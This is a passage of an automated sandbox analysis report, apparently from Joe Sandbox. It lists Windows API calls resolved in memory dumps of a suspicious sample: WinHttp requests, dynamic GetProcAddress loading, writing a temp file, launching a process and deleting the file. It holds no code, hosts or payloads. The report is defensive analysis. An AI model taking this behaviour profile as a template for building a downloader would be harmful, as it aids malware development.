                  • WinHttpReceiveResponse.WINHTTP(00000000,00000000,?,?,?,?,?,001F04FB,?,?,?,?,001F04FF), ref: 001E7419
                  • WinHttpQueryHeaders.WINHTTP(00000000,20000013,00000000,?,0000000C,00000000,?,?,?,?,?,001F04FB,?,?,?,?), ref: 001E7440
                  • WinHttpQueryDataAvailable.WINHTTP(00000000,00000004,?,?,?,?,?,001F04FB,?,?,?,?,001F04FF), ref: 001E746C
                  • WinHttpReadData.WINHTTP(00000000,00000000,00000000,?,?,?,?,?,?,?,?,001F04FB,?,?,?,?), ref: 001E74AD
                  • WinHttpCloseHandle.WINHTTP(00000000,?,?,?,?,?,001F04FB,?,?,?,?,001F04FF), ref: 001E74D7
                  • WinHttpCloseHandle.WINHTTP(00000000,?,?,?,?,?,001F04FB,?,?,?,?,001F04FF), ref: 001E74E1
                  • WinHttpCloseHandle.WINHTTP(?,?,001F04FB,?,?,?,?,001F04FF), ref: 001E74EB
                    • Part of subcall function 001EBC60: HeapFree.KERNEL32(00210000,00000008,001F06F6), ref: 001EBC73
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  APIs
                  • memset.MSVCRT ref: 001EE25C
                  • GetProcAddress.KERNEL32(001ECB21,?), ref: 001EE3F1
                  • GetProcAddress.KERNEL32(001ECB21,?), ref: 001EE419
                  • GetProcAddress.KERNEL32(001ECB21,?), ref: 001EE441
                  • GetProcAddress.KERNEL32(001ECB21,?), ref: 001EE469
                  • GetProcAddress.KERNEL32(001ECB21,?), ref: 001EE491
                  • GetProcAddress.KERNEL32(001ECB21,?), ref: 001EE4B9
                  • GetProcAddress.KERNEL32(001ECB21,?), ref: 001EE4E1
                  • GetProcAddress.KERNEL32(001ECB21,?), ref: 001EE509
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  APIs
                  • WinHttpCloseHandle.WINHTTP(?,00000000,00000000), ref: 001E884E
                  • WinHttpSetTimeouts.WINHTTP(?,00015F90,00015F90,0002BF20,000927C0,00000000,00000000), ref: 001E886F
                  • WinHttpOpenRequest.WINHTTP(?,?,00000004,00000000,00000000,00000000,?), ref: 001E88A6
                  • WinHttpSetOption.WINHTTP(00000000,0000001F,00000004,00000004), ref: 001E88C8
                  • WinHttpSendRequest.WINHTTP(?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001E88DC
                  • WinHttpCloseHandle.WINHTTP(?,00000000,00000000), ref: 001E8900
                  • WinHttpReceiveResponse.WINHTTP(?,00000000), ref: 001E891D
                  • WinHttpQueryHeaders.WINHTTP(?,20000013,00000000,?,00000004,00000000), ref: 001E893A
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  APIs
                  • WinHttpCloseHandle.WINHTTP(?,00000000,00000000), ref: 001EDB4E
                  • WinHttpSetTimeouts.WINHTTP(?,00015F90,00015F90,002932E0,0002BF20,00000000,00000000), ref: 001EDB6F
                  • WinHttpOpenRequest.WINHTTP(?,?,00000004,00000000,00000000,00000000,?), ref: 001EDBA6
                  • WinHttpSetOption.WINHTTP(00000000,0000001F,00000004,00000004), ref: 001EDBCC
                  • WinHttpSendRequest.WINHTTP(?,?,?,?,?,?,00000000), ref: 001EDBEF
                  • WinHttpReceiveResponse.WINHTTP(?,00000000), ref: 001EDBFE
                  • WinHttpQueryHeaders.WINHTTP(?,20000013,00000000,?,00000004,00000000), ref: 001EDC1B
                  • WinHttpCloseHandle.WINHTTP(?,00000000,00000000), ref: 001EDC42
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  APIs
                    • Part of subcall function 001E3350: ??3@YAXPAX@Z.MSVCRT ref: 001E3371
                  • SysFreeString.OLEAUT32(?), ref: 001EE008
                  • SysFreeString.OLEAUT32(?), ref: 001EE015
                  • SysFreeString.OLEAUT32(?), ref: 001EE022
                    • Part of subcall function 001EB300: SysFreeString.OLEAUT32(?), ref: 001EB318
                    • Part of subcall function 001EB300: SysFreeString.OLEAUT32(?), ref: 001EB321
                  • ??2@YAPAXI@Z.MSVCRT ref: 001EE0F5
                    • Part of subcall function 001F0C60: ??2@YAPAXI@Z.MSVCRT ref: 001F0C8F
                    • Part of subcall function 001E2200: SysAllocString.OLEAUT32(?), ref: 001E2211
                    • Part of subcall function 001E2200: SysAllocString.OLEAUT32(?), ref: 001E2219
                  • SysFreeString.OLEAUT32(?), ref: 001EE149
                  • SysFreeString.OLEAUT32(?), ref: 001EE153
                  • SysFreeString.OLEAUT32(?), ref: 001EE15D
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  APIs
                  • SysFreeString.OLEAUT32(?), ref: 001EAD77
                    • Part of subcall function 001F2DB0: tolower.MSVCRT ref: 001F2DEB
                  • SysFreeString.OLEAUT32(?), ref: 001EAC38
                  • SysFreeString.OLEAUT32(?), ref: 001EAC49
                  • SysAllocString.OLEAUT32(?), ref: 001EACD4
                    • Part of subcall function 001EBC60: HeapFree.KERNEL32(00210000,00000008,001F06F6), ref: 001EBC73
                  • _wtoi.MSVCRT ref: 001EACA4
                    • Part of subcall function 001EDF60: SysFreeString.OLEAUT32(?), ref: 001EE008
                    • Part of subcall function 001EDF60: SysFreeString.OLEAUT32(?), ref: 001EE015
                    • Part of subcall function 001EDF60: SysFreeString.OLEAUT32(?), ref: 001EE022
                    • Part of subcall function 001EDF60: ??2@YAPAXI@Z.MSVCRT ref: 001EE0F5
                    • Part of subcall function 001EDF60: SysFreeString.OLEAUT32(?), ref: 001EE149
                    • Part of subcall function 001EDF60: SysFreeString.OLEAUT32(?), ref: 001EE153
                    • Part of subcall function 001EDF60: SysFreeString.OLEAUT32(?), ref: 001EE15D
                    • Part of subcall function 001E3F10: SysFreeString.OLEAUT32(?), ref: 001E4028
                    • Part of subcall function 001E3F10: SysFreeString.OLEAUT32(?), ref: 001E403D
                    • Part of subcall function 001E3F10: _wtoi.MSVCRT ref: 001E40EE
                    • Part of subcall function 001E3F10: rand.MSVCRT ref: 001E4160
                    • Part of subcall function 001E3F10: SysFreeString.OLEAUT32(?), ref: 001E430F
                    • Part of subcall function 001E3F10: SysFreeString.OLEAUT32(?), ref: 001E431D
                  • SysFreeString.OLEAUT32(?), ref: 001EAD69
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  APIs
                  • SysFreeString.OLEAUT32(?), ref: 001E4028
                  • SysFreeString.OLEAUT32(?), ref: 001E403D
                  • _wtoi.MSVCRT ref: 001E40EE
                  • rand.MSVCRT ref: 001E4160
                    • Part of subcall function 001EBC60: HeapFree.KERNEL32(00210000,00000008,001F06F6), ref: 001EBC73
                  • SysFreeString.OLEAUT32(?), ref: 001E430F
                  • SysFreeString.OLEAUT32(?), ref: 001E431D
                    • Part of subcall function 001F1F60: LoadLibraryA.KERNEL32(?), ref: 001F1F87
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FA8
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FCE
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FEC
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F200A
                    • Part of subcall function 001F1F60: GetProcessHeap.KERNEL32 ref: 001F2015
                    • Part of subcall function 001F1F60: RtlReAllocateHeap.NTDLL(00210000,00000008,?,001F0639), ref: 001F202F
                    • Part of subcall function 001F1F60: RtlAllocateHeap.NTDLL(00210000,00000008,001F0639), ref: 001F2042
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  APIs
                  • SysFreeString.OLEAUT32(?), ref: 001EC149
                  • SysFreeString.OLEAUT32(?), ref: 001EC15E
                  • _wtoi.MSVCRT ref: 001EC215
                  • rand.MSVCRT ref: 001EC260
                    • Part of subcall function 001EBC60: HeapFree.KERNEL32(00210000,00000008,001F06F6), ref: 001EBC73
                  • SysFreeString.OLEAUT32(?), ref: 001EC3AE
                  • SysFreeString.OLEAUT32(?), ref: 001EC3BC
                    • Part of subcall function 001F1F60: LoadLibraryA.KERNEL32(?), ref: 001F1F87
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FA8
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FCE
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FEC
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F200A
                    • Part of subcall function 001F1F60: GetProcessHeap.KERNEL32 ref: 001F2015
                    • Part of subcall function 001F1F60: RtlReAllocateHeap.NTDLL(00210000,00000008,?,001F0639), ref: 001F202F
                    • Part of subcall function 001F1F60: RtlAllocateHeap.NTDLL(00210000,00000008,001F0639), ref: 001F2042
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  APIs
                  • ??2@YAPAXI@Z.MSVCRT ref: 001F2C56
                  • ??2@YAPAXI@Z.MSVCRT ref: 001F2C90
                  • ??2@YAPAXI@Z.MSVCRT ref: 001F2CDB
                  • ??3@YAXPAX@Z.MSVCRT ref: 001F2D75
                  • ??3@YAXPAX@Z.MSVCRT ref: 001F2D8A
                    • Part of subcall function 001ECCF0: SysFreeString.OLEAUT32(?), ref: 001ECD01
                  • ??3@YAXPAX@Z.MSVCRT ref: 001F2D9E
                    • Part of subcall function 001E1F50: memcpy.MSVCRT ref: 001E1FEC
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  APIs
                  • memset.MSVCRT ref: 001F265F
                  • CreateProcessA.KERNEL32(00000000,001F2798,00000000,00000000,00000000,00000010,00000000,00000000,?,?), ref: 001F2698
                  • WaitForSingleObject.KERNEL32(?,00002710), ref: 001F26AE
                  • CloseHandle.KERNEL32(?), ref: 001F26BE
                  • CloseHandle.KERNEL32(?), ref: 001F26C4
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  APIs
                  • SysFreeString.OLEAUT32(?), ref: 001E840C
                  • SysAllocString.OLEAUT32(?), ref: 001E8561
                    • Part of subcall function 001EBC60: HeapFree.KERNEL32(00210000,00000008,001F06F6), ref: 001EBC73
                  • SysFreeString.OLEAUT32(?), ref: 001E841D
                    • Part of subcall function 001E3150: SysFreeString.OLEAUT32(?), ref: 001E31A8
                    • Part of subcall function 001E3150: SysFreeString.OLEAUT32(?), ref: 001E31BD
                    • Part of subcall function 001E3150: SysFreeString.OLEAUT32(?), ref: 001E3320
                    • Part of subcall function 001E3150: SysFreeString.OLEAUT32(?), ref: 001E332E
                    • Part of subcall function 001E2300: SysFreeString.OLEAUT32(?), ref: 001E23B8
                    • Part of subcall function 001E2300: SysFreeString.OLEAUT32(?), ref: 001E24BB
                    • Part of subcall function 001E5460: SysFreeString.OLEAUT32(?), ref: 001E551E
                    • Part of subcall function 001E5460: SysFreeString.OLEAUT32(?), ref: 001E552F
                    • Part of subcall function 001E5460: _wtoi.MSVCRT ref: 001E563B
                    • Part of subcall function 001E5460: SysFreeString.OLEAUT32(?), ref: 001E5685
                    • Part of subcall function 001E5460: SysFreeString.OLEAUT32(?), ref: 001E5693
                  • SysFreeString.OLEAUT32(?), ref: 001E867C
                  • SysFreeString.OLEAUT32(?), ref: 001E868A
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  APIs
                    • Part of subcall function 001E52C0: SysFreeString.OLEAUT32(00000000), ref: 001E52D7
                    • Part of subcall function 001E52C0: SysFreeString.OLEAUT32(00000001), ref: 001E52E5
                  • SysFreeString.OLEAUT32(?), ref: 001E551E
                  • SysFreeString.OLEAUT32(?), ref: 001E552F
                    • Part of subcall function 001EB300: SysFreeString.OLEAUT32(?), ref: 001EB318
                    • Part of subcall function 001EB300: SysFreeString.OLEAUT32(?), ref: 001EB321
                  • _wtoi.MSVCRT ref: 001E563B
                  • SysFreeString.OLEAUT32(?), ref: 001E5685
                  • SysFreeString.OLEAUT32(?), ref: 001E5693
                    • Part of subcall function 001F1F60: LoadLibraryA.KERNEL32(?), ref: 001F1F87
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FA8
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FCE
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FEC
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F200A
                    • Part of subcall function 001F1F60: GetProcessHeap.KERNEL32 ref: 001F2015
                    • Part of subcall function 001F1F60: RtlReAllocateHeap.NTDLL(00210000,00000008,?,001F0639), ref: 001F202F
                    • Part of subcall function 001F1F60: RtlAllocateHeap.NTDLL(00210000,00000008,001F0639), ref: 001F2042
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  APIs
                  • SysFreeString.OLEAUT32(?), ref: 001E9F28
                  • SysFreeString.OLEAUT32(?), ref: 001E9F39
                  • _wtoi.MSVCRT ref: 001E9FA5
                    • Part of subcall function 001EC060: SysFreeString.OLEAUT32(?), ref: 001EC149
                    • Part of subcall function 001EC060: SysFreeString.OLEAUT32(?), ref: 001EC15E
                    • Part of subcall function 001EC060: _wtoi.MSVCRT ref: 001EC215
                    • Part of subcall function 001EC060: rand.MSVCRT ref: 001EC260
                    • Part of subcall function 001EC060: SysFreeString.OLEAUT32(?), ref: 001EC3AE
                    • Part of subcall function 001EC060: SysFreeString.OLEAUT32(?), ref: 001EC3BC
                  • SysFreeString.OLEAUT32(?), ref: 001EA036
                  • SysFreeString.OLEAUT32(?), ref: 001EA044
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  APIs
                  • ??2@YAPAXI@Z.MSVCRT ref: 001E6A86
                  • ??2@YAPAXI@Z.MSVCRT ref: 001E6AA1
                    • Part of subcall function 001EBC60: HeapFree.KERNEL32(00210000,00000008,001F06F6), ref: 001EBC73
                  • ??3@YAXPAX@Z.MSVCRT ref: 001E6BB0
                  • ??3@YAXPAX@Z.MSVCRT ref: 001E6BDE
                  • ??3@YAXPAX@Z.MSVCRT ref: 001E6C48
                    • Part of subcall function 001ECCF0: SysFreeString.OLEAUT32(?), ref: 001ECD01
                  • ??3@YAXPAX@Z.MSVCRT ref: 001E6CA1
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  APIs
                  • _time64.MSVCRT ref: 001E4D6F
                  • _time64.MSVCRT ref: 001E4DAB
                    • Part of subcall function 001E5A90: Sleep.KERNEL32(00009C40,?,?,?,?,?,?,?,00000000,001F00C1), ref: 001E5B3F
                  • Sleep.KERNEL32(00001388), ref: 001E4E40
                  • _time64.MSVCRT ref: 001E4EF8
                    • Part of subcall function 001EBC60: HeapFree.KERNEL32(00210000,00000008,001F06F6), ref: 001EBC73
                    • Part of subcall function 001F0E20: _vsnwprintf.MSVCRT ref: 001F0E52
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  APIs
                    • Part of subcall function 001E5A90: Sleep.KERNEL32(00009C40,?,?,?,?,?,?,?,00000000,001F00C1), ref: 001E5B3F
                  • ??2@YAPAXI@Z.MSVCRT ref: 001E207A
                  • ??3@YAXPAX@Z.MSVCRT ref: 001E21CF
                    • Part of subcall function 001F1F60: LoadLibraryA.KERNEL32(?), ref: 001F1F87
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FA8
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FCE
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FEC
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F200A
                    • Part of subcall function 001F1F60: GetProcessHeap.KERNEL32 ref: 001F2015
                    • Part of subcall function 001F1F60: RtlReAllocateHeap.NTDLL(00210000,00000008,?,001F0639), ref: 001F202F
                    • Part of subcall function 001F1F60: RtlAllocateHeap.NTDLL(00210000,00000008,001F0639), ref: 001F2042
                  • ??3@YAXPAX@Z.MSVCRT ref: 001E2176
                  • _time64.MSVCRT ref: 001E21A8
                    • Part of subcall function 001ECCF0: SysFreeString.OLEAUT32(?), ref: 001ECD01
                    • Part of subcall function 001EBC60: HeapFree.KERNEL32(00210000,00000008,001F06F6), ref: 001EBC73
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  APIs
                    • Part of subcall function 001EB300: SysFreeString.OLEAUT32(?), ref: 001EB318
                    • Part of subcall function 001EB300: SysFreeString.OLEAUT32(?), ref: 001EB321
                  • SysFreeString.OLEAUT32(?), ref: 001E31A8
                  • SysFreeString.OLEAUT32(?), ref: 001E31BD
                    • Part of subcall function 001F0DF0: SysAllocString.OLEAUT32(?), ref: 001F0E03
                    • Part of subcall function 001EF560: SysAllocString.OLEAUT32(?), ref: 001EF574
                  • SysFreeString.OLEAUT32(?), ref: 001E3320
                  • SysFreeString.OLEAUT32(?), ref: 001E332E
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  APIs
                  • ??2@YAPAXI@Z.MSVCRT ref: 001F2ADD
                  • ??3@YAXPAX@Z.MSVCRT ref: 001F2B54
                  • _time64.MSVCRT ref: 001F2B82
                    • Part of subcall function 001ECCF0: SysFreeString.OLEAUT32(?), ref: 001ECD01
                  • ??3@YAXPAX@Z.MSVCRT ref: 001F2BAA
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  APIs
                  • memset.MSVCRT ref: 001F26EC
                  • GetTempPathA.KERNEL32(00000104,?), ref: 001F2700
                    • Part of subcall function 001F2600: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,10000080,00000000), ref: 001F261A
                    • Part of subcall function 001F2600: WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 001F2631
                    • Part of subcall function 001F2600: CloseHandle.KERNEL32(00000000), ref: 001F2638
                    • Part of subcall function 001F2650: memset.MSVCRT ref: 001F265F
                    • Part of subcall function 001F2650: CreateProcessA.KERNEL32(00000000,001F2798,00000000,00000000,00000000,00000010,00000000,00000000,?,?), ref: 001F2698
                    • Part of subcall function 001F2650: WaitForSingleObject.KERNEL32(?,00002710), ref: 001F26AE
                    • Part of subcall function 001F2650: CloseHandle.KERNEL32(?), ref: 001F26BE
                    • Part of subcall function 001F2650: CloseHandle.KERNEL32(?), ref: 001F26C4
                  • DeleteFileA.KERNEL32(qega,regi,qega,?,?), ref: 001F279F
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  APIs
                  • WinHttpCloseHandle.WINHTTP(?,00000000,001ECFBA,001F311D), ref: 001E16F2
                  • WinHttpCloseHandle.WINHTTP(?,00000000,001ECFBA,001F311D), ref: 001E16FC
                  • WinHttpCloseHandle.WINHTTP(?,00000000,001ECFBA,001F311D), ref: 001E1706
                    • Part of subcall function 001EBC60: HeapFree.KERNEL32(00210000,00000008,001F06F6), ref: 001EBC73
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  APIs
                  • WSAStartup.WS2_32(00000202,?), ref: 001E9ADA
                  • freeaddrinfo.WS2_32(00000000,001F043A), ref: 001E9B3B
                    • Part of subcall function 001F0E20: _vsnwprintf.MSVCRT ref: 001F0E52
                  • getaddrinfo.WS2_32(001F043A,00000000,?,00000000), ref: 001E9BD6
                  • freeaddrinfo.WS2_32(00000000), ref: 001E9C1E
                  • WSACleanup.WS2_32 ref: 001E9C44
                    • Part of subcall function 001EBC60: HeapFree.KERNEL32(00210000,00000008,001F06F6), ref: 001EBC73
                    • Part of subcall function 001F1F60: LoadLibraryA.KERNEL32(?), ref: 001F1F87
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FA8
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FCE
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FEC
